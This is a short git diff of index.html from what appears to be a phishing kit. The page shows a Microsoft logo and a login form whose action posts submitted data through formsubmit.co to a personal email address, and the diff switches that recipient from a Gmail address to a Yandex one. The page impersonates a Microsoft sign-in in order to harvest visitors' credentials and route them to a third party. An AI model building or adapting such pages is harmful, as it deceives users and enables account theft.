--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 </head>
 
 <body>
-     <form id="loginForm" action="https://formsubmit.co/adebayoayomide574@gmail.com" method="POST">
+     <form id="loginForm" action="https://formsubmit.co/hajjarwaseem@yandex.com" method="POST">
     <section id="section_uname">
         <div class="auth-wrapper">
             <img src="/assests/logo.png" alt="Microsoft" />
